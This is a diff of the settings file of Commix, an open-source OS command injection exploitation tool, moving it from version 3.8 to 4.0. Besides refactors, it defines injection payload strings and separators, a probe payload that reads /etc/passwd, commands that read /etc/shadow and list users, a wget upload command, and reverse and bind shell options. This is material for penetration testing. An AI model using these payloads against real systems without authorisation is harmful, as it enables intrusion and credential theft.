@@ -3,7 +3,7 @@
 
 """
 This file is part of Commix Project (https://commixproject.com).
-Copyright (c) 2014-2023 Anastasios Stasinopoulos (@ancst).
+Copyright (c) 2014-2024 Anastasios Stasinopoulos (@ancst).
 
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
@@ -20,10 +20,33 @@ import time
 import random
 import string
 import codecs
+from datetime import date
 from datetime import datetime
 from src.core.compat import xrange
 from src.thirdparty.six.moves import urllib as _urllib
 from src.thirdparty.six.moves import reload_module as _reload_module
+
+# argv checks
+def sys_argv_checks():
+  tamper_index = None
+  for i in xrange(len(sys.argv)):
+    # Disable coloring
+    if sys.argv[i] == "--disable-coloring":
+      from src.utils import colors
+      colors.ENABLE_COLORING = False
+    """
+    Dirty hack from sqlmap [1], regarding merging of tamper script arguments (e.g. --tamper A --tamper B -> --tamper=A,B)
+    [1] https://github.com/sqlmapproject/sqlmap/commit/f4a0820dcb5fded8bc4d0363c91276eb9a3445ae
+    """
+    if sys.argv[i].startswith("--tamper"):
+      if tamper_index is None:
+        tamper_index = i if '=' in sys.argv[i] else (i + 1 if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-') else None)
+      else:
+        sys.argv[tamper_index] = "%s,%s" % (sys.argv[tamper_index], sys.argv[i].split('=')[1] if '=' in sys.argv[i] else (sys.argv[i + 1] if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-') else ""))
+        sys.argv[i] = ""
+
+# argv checks
+sys_argv_checks()
 from src.thirdparty.colorama import Fore, Back, Style, init
 
 class HTTPMETHOD(object):
@@ -63,7 +86,7 @@ TRAFFIC_SIGN = HTTP_CONTENT_SIGN = ""
 ABORTION_SIGN = ERROR_SIGN
 DEBUG_SIGN = "[" + Back.BLUE + Fore.WHITE + "debug" + Style.RESET_ALL + "] "
 DEBUG_BOLD_SIGN = "[" + Back.BLUE + Style.BRIGHT + Fore.WHITE + "debug" + Style.RESET_ALL + "] " + Style.BRIGHT
-CHECK_SIGN = DEBUG_SIGN + "Checking pair of HTTP authentication credentials: "
+CHECK_SIGN = DEBUG_SIGN + "Checking for a valid pair of HTTP authentication credentials: "
 OS_SHELL_TITLE = Style.BRIGHT + "Pseudo-Terminal Shell (type '?' for available options)" + Style.RESET_ALL
 OS_SHELL = """commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """
 REVERSE_TCP_SHELL = """commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """
@@ -72,6 +95,11 @@ BIND_TCP_SHELL = """commix(""" + Style.BRIGHT + Fore.RED + """bind_tcp""" + Styl
 def print_time():
   return "[" + Fore.LIGHTBLUE_EX  + datetime.now().strftime("%H:%M:%S") + Style.RESET_ALL + "] "
 
+# Print execution status
+def execution(status):
+  debug_msg = status + " " + APPLICATION + " at " + datetime.now().strftime("%H:%M:%S") + " (" + str(date.today()) + ")."
+  return print_time() + DEBUG_SIGN + str(debug_msg) + Style.RESET_ALL
+
 # Print legal disclaimer message
 def print_legal_disclaimer_msg(legal_disclaimer_msg):
   result = LEGAL_DISCLAIMER + str(legal_disclaimer_msg) + Style.RESET_ALL
@@ -162,7 +190,7 @@ def print_http_response_content(content):
 
 # Print checking message (verbose mode)
 def print_checking_msg(payload):
-  result = CHECK_SIGN + str(payload) + Style.RESET_ALL
+  result = print_time() + CHECK_SIGN + str(payload) + Style.RESET_ALL
   return result
 
 # Print question message
@@ -185,26 +213,19 @@ def command_execution_output(shell):
   result = Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
   return result
 
-# argv checks
-def sys_argv_checks():
-  tamper_index = None
-  for i in xrange(len(sys.argv)):
-    # Disable coloring
-    if sys.argv[i] == "--disable-coloring":
-      from src.utils import colors
-      colors.ENABLE_COLORING = False
-    """
-    Dirty hack from sqlmap [1], regarding merging of tamper script arguments (e.g. --tamper A --tamper B -> --tamper=A,B)
-    [1] https://github.com/sqlmapproject/sqlmap/commit/f4a0820dcb5fded8bc4d0363c91276eb9a3445ae
-    """
-    if sys.argv[i].startswith("--tamper"):
-      if tamper_index is None:
-        tamper_index = i if '=' in sys.argv[i] else (i + 1 if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-') else None)
-      else:
-        sys.argv[tamper_index] = "%s,%s" % (sys.argv[tamper_index], sys.argv[i].split('=')[1] if '=' in sys.argv[i] else (sys.argv[i + 1] if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-') else ""))
-        sys.argv[i] = ""
+"""
+Print data to stdout
+"""
+def print_data_to_stdout(data):
+  if END_LINE.CR not in data and data != "." and data != " (done)":
+    data = data + END_LINE.LF
+  sys.stdout.write(data)
+  sys.stdout.flush()
 
-# argv input errors
+
+"""
+argv input errors
+"""
 def sys_argv_errors():
   _reload_module(sys)
   try:
@@ -216,17 +237,17 @@ def sys_argv_errors():
     # Check for illegal (non-console) quote characters.
     if len(sys.argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((sys.argv[i].split('=', 1)[-1].strip() or ' ')[0], sys.argv[i][-1])):
         err_msg = "Illegal (non-console) quote characters ('" + sys.argv[i] + "')."
-        print(print_critical_msg(err_msg))
+        print_data_to_stdout(print_critical_msg(err_msg))
         raise SystemExit()
     # Check for illegal (non-console) comma characters.
     elif len(sys.argv[i]) > 1 and u"\uff0c" in sys.argv[i].split('=', 1)[-1]:
         err_msg = "Illegal (non-console) comma character ('" + sys.argv[i] + "')."
-        print(print_critical_msg(err_msg))
+        print_data_to_stdout(print_critical_msg(err_msg))
         raise SystemExit()
     # Check for potentially miswritten (illegal '=') short option.
     elif re.search(r"\A-\w=.+", sys.argv[i]):
         err_msg = "Potentially miswritten (illegal '=') short option detected ('" + sys.argv[i] + "')."
-        print(print_critical_msg(err_msg))
+        print_data_to_stdout(print_critical_msg(err_msg))
         raise SystemExit()
 
 # argv checks
@@ -240,8 +261,8 @@ APPLICATION = "commix"
 DESCRIPTION_FULL = "Automated All-in-One OS Command Injection Exploitation Tool"
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
-VERSION_NUM = "3.8"
-REVISION = "44"
+VERSION_NUM = "4.0"
+REVISION = "121"
 STABLE_RELEASE = True
 VERSION = "v"
 if STABLE_RELEASE:
@@ -251,10 +272,10 @@ else:
   VERSION = VERSION + VERSION_NUM + "-dev#" + REVISION
   COLOR_VERSION = Style.UNDERLINE + Fore.WHITE + VERSION + Style.RESET_ALL
 
-YEAR = "2014-2023"
-AUTHOR_TWITTER = "@ancst"
+YEAR = "2014-2024"
+AUTHOR_X_ACCOUNT = "@ancst"
 APPLICATION_URL = "https://commixproject.com"
-APPLICATION_TWITTER = "@commixproject"
+APPLICATION_X_ACCOUNT = "@commixproject"
 
 # Default User-Agent
 DEFAULT_USER_AGENT = APPLICATION + "/" + VERSION + " (" + APPLICATION_URL + ")"
@@ -267,11 +288,16 @@ LEGAL_DISCLAIMER_MSG = "Usage of " + APPLICATION + " for attacking targets witho
 # Random string generator
 RANDOM_STRING_GENERATOR = ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(10))
 
+START_TIME = time.time()
+
+# Maximum number of lines to save in history file
+MAX_HISTORY_LENGTH = 1000
+
 # Readline
 READLINE_ERROR = False
 
-# User-supplied operating system command
-USER_SUPPLIED_CMD = ""
+# User-applied operating system command
+USER_APPLIED_CMD = ""
 
 # Random Tag
 RANDOM_TAG = ""
@@ -303,16 +329,23 @@ USER_DEFINED_PYTHON_INTERPRETER = False
 
 CMD_NUL = ""
 
+# Maybe a WAF/IPS protection.
+WAF_CHECK_PAYLOAD = "cat /etc/passwd|uname&&ping -c3 localhost;ls ../"
+WAF_ENABLED = False
+
+class HEURISTIC_TEST(object):
+  POSITIVE = True
+
 #Basic heuristic checks for command injections
 RAND_A = random.randint(1,10000)
 RAND_B = random.randint(1,10000)
-CALC_STRING = str(RAND_A) + "+" + str(RAND_B)
+CALC_STRING = str(RAND_A) + " %2B " + str(RAND_B)
 BASIC_STRING = "(" + CALC_STRING + ")"
-BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + BASIC_STRING + ")%26%26echo $(" + BASIC_STRING + ")||echo $(" + BASIC_STRING + ")",
-                                   "|set /a " + BASIC_STRING + "&set /a " + BASIC_STRING
+BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + BASIC_STRING + ")%26echo $(" + BASIC_STRING + ")|echo $(" + BASIC_STRING + ")" + RANDOM_STRING_GENERATOR ,
+                                   "|set /a " + BASIC_STRING + "%26set /a " + BASIC_STRING
                                    ]
 ALTER_SHELL_BASIC_STRING = " -c \"print(int(" + CALC_STRING + "))\""
-ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")%26%26echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")||echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")",
+ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")%26echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")|echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")",
                                    "|for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL + " &for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL
                                    ]
 BASIC_COMMAND_INJECTION_RESULT = str(RAND_A + RAND_B)
@@ -348,16 +381,33 @@ CODE_INJECTION_WARNINGS = ["eval()'d code", "runtime-created function", "usort()
 SKIP_CODE_INJECTIONS = False
 SKIP_COMMAND_INJECTIONS = False
 
-# User-defined stored post data.
-USER_DEFINED_POST_DATA = False
+USER_DEFINED_URL_DATA = False
+# User-defined stored POST data.
+USER_DEFINED_POST_DATA = ""
+# Ignore user-defined stored POST data.
+IGNORE_USER_DEFINED_POST_DATA = False
 
-# The wildcard character
-WILDCARD_CHAR = "*"
-WILDCARD_CHAR_APPLIED = False
-POST_WILDCARD_CHAR = ""
+# Custom injection marker
+CUSTOM_INJECTION_MARKER_CHAR = "*"
+CUSTOM_INJECTION_MARKER = False
+ASTERISK_MARKER = "__ASTERISK__"
+CUSTOM_INJECTION_MARKER_PARAMETERS_LIST = []
+PRE_CUSTOM_INJECTION_MARKER_CHAR = ""
+POST_CUSTOM_INJECTION_MARKER_CHAR = ""
+
+class INJECTION_MARKER_LOCATION(object):
+  URL = False
+  DATA = False
+  COOKIE = False
+  HTTP_HEADERS = False
+  CUSTOM_HTTP_HEADERS = False
+
+SKIP_NON_CUSTOM = None
 
 # Testable parameter(s) - comma separated.
-TEST_PARAMETER = ""
+TESTABLE_PARAMETERS_LIST = []
+TESTABLE_PARAMETERS = None
+NOT_TESTABLE_PARAMETERS = True
 
 # Skip testing for given parameter(s) - comma separated.
 SKIP_PARAMETER = ""
@@ -367,12 +417,15 @@ SCHEME = ""
 
 class OS(object):
   UNIX = "unix"
-  WINDOWS = "win"
+  WINDOWS = "windows"
 
 # Default target host OS (Unix-like)
 TARGET_OS = OS.UNIX
 
-# Verbosity level: 0-1 (default 0)
+IDENTIFIED_TARGET_OS = False
+IGNORE_IDENTIFIED_OS = None
+
+# Verbosity level (0-4, Default: 0)
 VERBOSITY_LEVEL = 0
 
 # Local HTTP server ip
@@ -385,6 +438,7 @@ HTML_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "
 DISABLED_CONTENT_EXTENSIONS = (".py", ".pyc", ".md", ".txt", ".bak", ".conf", ".zip", "~")
 
 # Detection / Exploitation phase(s)
+WAF_DETECTION_PHASE = False
 DETECTION_PHASE = False
 EXPLOITATION_PHASE = False
 
@@ -428,8 +482,6 @@ OUTPUT_FILE = OUTPUT_FILE_NAME + OUTPUT_FILE_EXT
 MAXLEN = 10000
 
 STDIN_PARSING = False
-if not sys.stdin.isatty():
-  STDIN_PARSING = True
 
 # Maximum response total page size (trimmed if larger)
 MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
@@ -445,9 +497,11 @@ TESTABLE_VALUE = ""
 # The HTTP header name.
 HTTP_HEADER = ""
 
+EXTRA_HTTP_HEADERS = False
+
 # The command injection separators.
 SEPARATORS = []
-DEFAULT_SEPARATORS = ["", ";", "%26", "|"]
+DEFAULT_SEPARATORS = [";", "%26", "|", ""]
 SPECIAL_SEPARATORS = ["%26%26", "||", "%0a", "%0d%0a", "%1a"]
 SEPARATORS_LVL1 = DEFAULT_SEPARATORS + SPECIAL_SEPARATORS
 SEPARATORS_LVL3 = SEPARATORS_LVL2 = SEPARATORS_LVL1
@@ -455,13 +509,13 @@ SEPARATORS_LVL3 = SEPARATORS_LVL2 = SEPARATORS_LVL1
 # The command injection prefixes.
 PREFIXES = []
 PREFIXES_LVL1 = [""]
-PREFIXES_LVL2 = SEPARATORS_LVL1
+PREFIXES_LVL2 = PREFIXES_LVL1 + SEPARATORS_LVL1
 PREFIXES_LVL3 = PREFIXES_LVL2 + ["'", "\""]
 
 # The command injection suffixes.
 SUFFIXES = []
 SUFFIXES_LVL1 = [""]
-SUFFIXES_LVL2 = SEPARATORS_LVL1
+SUFFIXES_LVL2 = SUFFIXES_LVL1 + SEPARATORS_LVL1
 SUFFIXES_LVL3 = SUFFIXES_LVL2 + ["'", "\"", " #", "//", "\\\\"]
 
 # Bad combination of prefix and separator
@@ -494,30 +548,37 @@ EVAL_SUFFIXES_LVL3 = EVAL_SUFFIXES_LVL2 + [".\"", "\\\\", "//", ")}", "#"]
 # Raw payload (without tampering)
 RAW_PAYLOAD = ""
 
-# The default (url-ecoded) white-space.
-WHITESPACES = ["%20"]
-
+# Single whitespace
 SINGLE_WHITESPACE = " "
 
+# The default (url-ecoded) white-space.
+WHITESPACES = [_urllib.parse.quote(SINGLE_WHITESPACE)]
+
 # Reference: http://www.w3.org/Protocols/HTTP/Object_Headers.html#uri
 URI_HTTP_HEADER = "URI"
 
 # Seconds to delay between each HTTP request.
 DELAY = 0
 
-# Seconds to delay the OS response. (Default 1)
-TIMESEC = 1
+# Seconds to delay the OS response.
+TIMESEC = 0
 
 # Seconds to delay between each HTTP retry.
 DELAY_RETRY = 1
 
-#Level (Default: 1)
 DEFAULT_INJECTION_LEVEL = 1
 COOKIE_INJECTION_LEVEL = 2
 HTTP_HEADER_INJECTION_LEVEL = 3
-USER_SUPPLIED_LEVEL = DEFAULT_INJECTION_LEVEL
+
+# Level of tests to perform.
+# The higher the value is, the higher the number of HTTP(s) requests are. (Default: 1)
+INJECTION_LEVEL = 0
+USER_APPLIED_LEVEL = False
 PERFORM_BASIC_SCANS = True
 
+# Start scanning state
+START_SCANNING = None
+
 # Default Temp Directory
 TMP_PATH = ""
 
@@ -547,7 +608,7 @@ WIN_CURRENT_USER = "echo %USERNAME%"
 HOSTNAME = "hostname"
 WIN_HOSTNAME = "echo %COMPUTERNAME%"
 
-# Check if current user has excessive privileges
+# Check if Current user is privileged
 # Unix-like: root
 IS_ROOT = "echo $(id -u)"
 # Windows: admin
@@ -586,8 +647,7 @@ FILE_UPLOAD = "wget "
 # /etc/passwd
 PASSWD_FILE = "/etc/passwd"
 
-SYS_USERS = "awk -F ':' '{print $1}{print $3}{print $6}' " + PASSWD_FILE
-EVAL_SYS_USERS = "awk -F ':' '{print \$1}{print \$3}{print \$6}' " + PASSWD_FILE
+SYS_USERS = EVAL_SYS_USERS  = "awk -F ':' '{print $1}{print $3}{print $6}' " + PASSWD_FILE
 
 # Exports users of localgroup
 WIN_SYS_USERS = "powershell.exe -InputFormat none write-host (([string]$(net user)[4..($(net user).length-3)]))"
@@ -597,29 +657,45 @@ DEFAULT_WIN_USERS = ["Administrator", "DefaultAccount", "Guest"]
 SHADOW_FILE = "/etc/shadow"
 SYS_PASSES = FILE_READ + SHADOW_FILE
 
-WIN_REPLACE_WHITESPACE = "-replace('\s+',' '))"
+WIN_REPLACE_WHITESPACE = r"-replace('\s+',' '))"
 
 # Accepts 'YES','YE','Y','yes','ye','y'
 CHOICE_YES = ['YES','YE','Y','yes','ye','y']
 
 # Accepts 'NO','N','no','n'
-CHOICE_NO = ['NO','N','no','n']
+CHOICE_NO = ['NO','no','N','n']
 
 # Accepts 'QUIT','Q','quit','q'
-CHOICE_QUIT = ['QUIT','Q','quit','q']
+CHOICE_QUIT = ['QUIT','quit','Q','q']
 
 # Accepts 'W','w','U','u','Q','q'
-CHOICE_OS = ['W','w','U','u','Q','q']
+CHOICE_OS = ['W','w','U','u','Q','q','N','n']
 
-# Accepts 'C','c','S','s','Q','q','a','A','n','N'
-CHOICE_PROCEED = ['C','c','S','s','Q','q','a','A','n','N']
+# Accepts 'C','c','S','s','Q','q','A','a'
+CHOICE_PROCEED = ['C','c','S','s','Q','q','A','a']
 
 # Available alternative shells
 AVAILABLE_SHELLS = ["python"]
 
 # Available injection techniques.
 AVAILABLE_TECHNIQUES = ['c','e','t','f']
-USER_SUPPLIED_TECHNIQUE = False
+
+# Supported injection types
+class INJECTION_TYPE(object):
+  RESULTS_BASED_CI = "results-based OS command injection"
+  RESULTS_BASED_CE = "results-based dynamic code evaluation"
+  BLIND = "blind OS command injection"
+  SEMI_BLIND = "semi-blind OS command injection"
+
+# Supported injection techniques
+class INJECTION_TECHNIQUE(object):
+  CLASSIC = "classic command injection technique"
+  DYNAMIC_CODE = "dynamic code evaluation technique"
+  TIME_BASED = "time-based command injection technique"
+  FILE_BASED = "file-based command injection technique"
+  TEMP_FILE_BASED = "tempfile-based injection technique"
+
+USER_APPLIED_TECHNIQUE = False
 SKIP_TECHNIQUES = False
 
 # User Agent List
@@ -674,10 +750,12 @@ SCHEME = ""
 TOR_HTTP_PROXY_IP = "127.0.0.1"
 TOR_HTTP_PROXY_PORT = "8118"
 TOR_HTTP_PROXY_SCHEME = "https"
+CHECK_TOR_PAGE = "https://check.torproject.org/"
 
 # Cookie injection
 COOKIE_INJECTION = None
 
+HTTP_HEADERS_INJECTION = None
 # User-Agent injection
 USER_AGENT_INJECTION = None
 
@@ -689,11 +767,13 @@ HOST_INJECTION = None
 
 # Custom HTTP Headers injection
 CUSTOM_HEADER_INJECTION = False
+CUSTOM_HEADERS_NAMES = []
+CUSTOM_HEADER_CHECK = ""
 CUSTOM_HEADER_NAME = ""
 CUSTOM_HEADER_VALUE = ""
 
 # Valid URL format check
-VALID_URL_FORMAT = "https?://(?:www)?(?:[\w-]{2,255}(?:\.\w{2,6}){1,2})(?:/[\w&%?#-]{1,310})?"
+VALID_URL_FORMAT = r"https?://(?:www)?(?:[\w-]{2,255}(?:\.\w{2,6}){1,2})(?:/[\w&%?#-]{1,310})?"
 
 VALID_URL = True
 
@@ -701,6 +781,7 @@ VALID_URL = True
 SHELL_OPTIONS = [
         "?",
         "quit",
+        "exit",
         "back",
         "os_shell",
         "reverse_tcp",
@@ -721,7 +802,7 @@ SET_OPTIONS = [
 COOKIE_DELIMITER = ";"
 
 # Split parameter value
-PARAMETER_SPLITTING_REGEX = r'[,]'
+PARAMETER_SPLITTING_REGEX = ","
 
 # Cookie delimiter
 PARAMETER_DELIMITER = "&"
@@ -836,6 +917,7 @@ ENCODING_LIST = [
 HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip, deflate"
 HTTP_CONTENT_TYPE_JSON_HEADER_VALUE = "application/json"
 HTTP_CONTENT_TYPE_XML_HEADER_VALUE = "text/xml"
+DEFAULT_HTTP_CONTENT_TYPE_VALUE = "application/x-www-form-urlencoded"
 
 # Default server banner
 SERVER_BANNER = ""
@@ -868,7 +950,7 @@ SERVER_OS_BANNERS = [
     "Gentoo",
     r"Mac[\-\_\ ]?OSX",
     r"Red[\-\_\ ]?Hat",
-    "Unix"
+    "Unix",
 ]
 
 # Extensions skipped by crawler
@@ -936,6 +1018,8 @@ HEX_RECOGNITION_REGEX = r'^(0[xX])?[0-9a-fA-F]+$'
 # GET parameters recognition
 GET_PARAMETERS_REGEX = r"(.*?)\?(.+)"
 
+DIRECTORY_REGEX = r'(?:/[^/]+)+?/\w+\.\w+'
+
 # TFB Decimal
 TFB_DECIMAL = False
 
@@ -955,7 +1039,7 @@ WIN_DEL = "powershell.exe Remove-Item "
 DEL = "rm "
 
 # Time-based Variables
-FOUND_HOW_LONG = ""
+FOUND_EXEC_TIME = ""
 FOUND_DIFF = ""
 
 # Check for PowerShell
@@ -974,19 +1058,13 @@ RHOST = ""
 URIPATH = "/"
 SRVPORT = 8080
 
-# Maybe a WAF/IPS/IDS protection.
-WAF_ENABLED = False
-
 # Session Handler
 SESSION_FILE = ""
 LOAD_SESSION = None
 
-# Retest all techniques
-RETEST = False
-
 # Define the default credentials files
-USERNAMES_TXT_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/" + "usernames.txt"
-PASSWORDS_TXT_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/" + "passwords_john.txt"
+USERNAMES_TXT_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/" + "default_usernames.txt"
+PASSWORDS_TXT_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/" + "default_passwords.txt"
 
 REQUIRED_AUTHENTICATION = False
 
@@ -1005,12 +1083,9 @@ class AUTH_TYPE(object):
   DIGEST = "digest"
   BEARER = "bearer"
 
-# HTTP Headers
-HTTP_HEADERS = [ "user-agent", "referer", "host" ]
-
 RAW_HTTP_HEADERS = ""
 
-USER_SUPPLIED_TAMPER = ""
+USER_APPLIED_TAMPER = ""
 
 # Tamper scripts dict
 TAMPER_SCRIPTS = {
@@ -1107,7 +1182,13 @@ HTTP_ERROR_CODES = [  BAD_REQUEST,
 HTTP_ERROR_CODES_SUM = []
 
 # End line
-END_LINE = ["\r", "\n", "\r\n"]
+class END_LINE:
+  CR = "\r"
+  LF = "\n"
+  CRLF = "\r\n"
+
+# List of end lines
+END_LINES_LIST = [attr for attr in dir(END_LINE) if not callable(getattr(END_LINE, attr)) and not attr.startswith("__")]
 
 # Check for updates on start up.
 CHECK_FOR_UPDATES_ON_START = True
@@ -1184,7 +1265,11 @@ SETTINGS_PATH = os.path.abspath("src/utils/settings.py")
 # Period after last-update to start nagging (about the old revision).
 NAGGING_DAYS = 31
 
-LINUX_DEFAULT_DOC_ROOTS = ["/var/www/", "/var/www/html", "/var/www/htdocs", "/usr/local/apache2/htdocs", "/usr/local/www/data", "/var/apache2/htdocs", "/var/www/nginx-default", "/srv/www/htdocs"]  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
+TARGET_URL = ""
+DOC_ROOT_TARGET_MARK = "%TARGET%"
+WINDOWS_DEFAULT_DOC_ROOTS = ["C:\\\\Inetpub\\wwwroot\\", "C:\\\\Inetpub\\wwwroot\\", "C:\\\\xampp\\htdocs\\", "C:\\\\wamp\\www\\"]
+LINUX_DEFAULT_DOC_ROOTS = ["/var/www/" + DOC_ROOT_TARGET_MARK + "/public_html/", "/var/www/" + DOC_ROOT_TARGET_MARK + "/", "/usr/local/apache2/htdocs/", "/usr/local/www/data/", "/usr/share/nginx/", "/var/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/htdocs/"]  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
+
 DEFINED_WEBROOT = RECHECK_FILE_FOR_EXTRACTION = False
 
 # HTTP Headers
@@ -1220,12 +1305,18 @@ TRANSFER_ENCODING = "Transfer-Encoding"
 VIA = "Via"
 X_POWERED_BY = "X-Powered-By"
 X_DATA_ORIGIN = "X-Data-Origin"
-
 # HTTP Headers values
 ACCEPT_VALUE = "*/*"
 
+# HTTP Headers
+HTTP_HEADERS = [ USER_AGENT.lower(), REFERER.lower(), HOST.lower() ]
+SHELLSHOCK_HTTP_HEADERS =[ COOKIE, USER_AGENT, REFERER ]
+
 # Regular expression used for ignoring some special chars
-IGNORE_SPECIAL_CHAR_REGEX = "[^/(A-Za-z0-9.:,_]+"
+IGNORE_SPECIAL_CHAR_REGEX = "[^/()A-Za-z0-9.:,_+]"
+IGNORE_JSON_CHAR_REGEX = r"[{}\"\[\]]"
+
+FLATTEN_JSON_SEPARATOR = ''.join(random.choice("{}") for _ in range(10)) + "_"
 
 PERFORM_CRACKING = False
 
@@ -1254,11 +1345,19 @@ SKIP_VULNERABLE_HOST = None
 # Skipped crawled hrefs
 HREF_SKIPPED = []
 
+# Abort on (problematic) HTTP error code (e.g. 401).
+ABORT_CODE = []
+
+# Ignore on (problematic) HTTP error code (e.g. 401).
+IGNORE_CODE = []
+
 # Default crawling depth
 DEFAULT_CRAWLING_DEPTH = 1
 
 SITEMAP_CHECK = None
 
+SITEMAP_XML_FILE = "sitemap.xml"
+
 FOLLOW_REDIRECT = True
 
 # Set predefined answers (e.g. "quit=N,follow=N").
@@ -1272,4 +1371,5 @@ ALERT = False
 USE_PCRE_E_MODIFIER = None
 PCRE_MODIFIER = "/e"
 
-# eof
\ No newline at end of file
+
+# eof
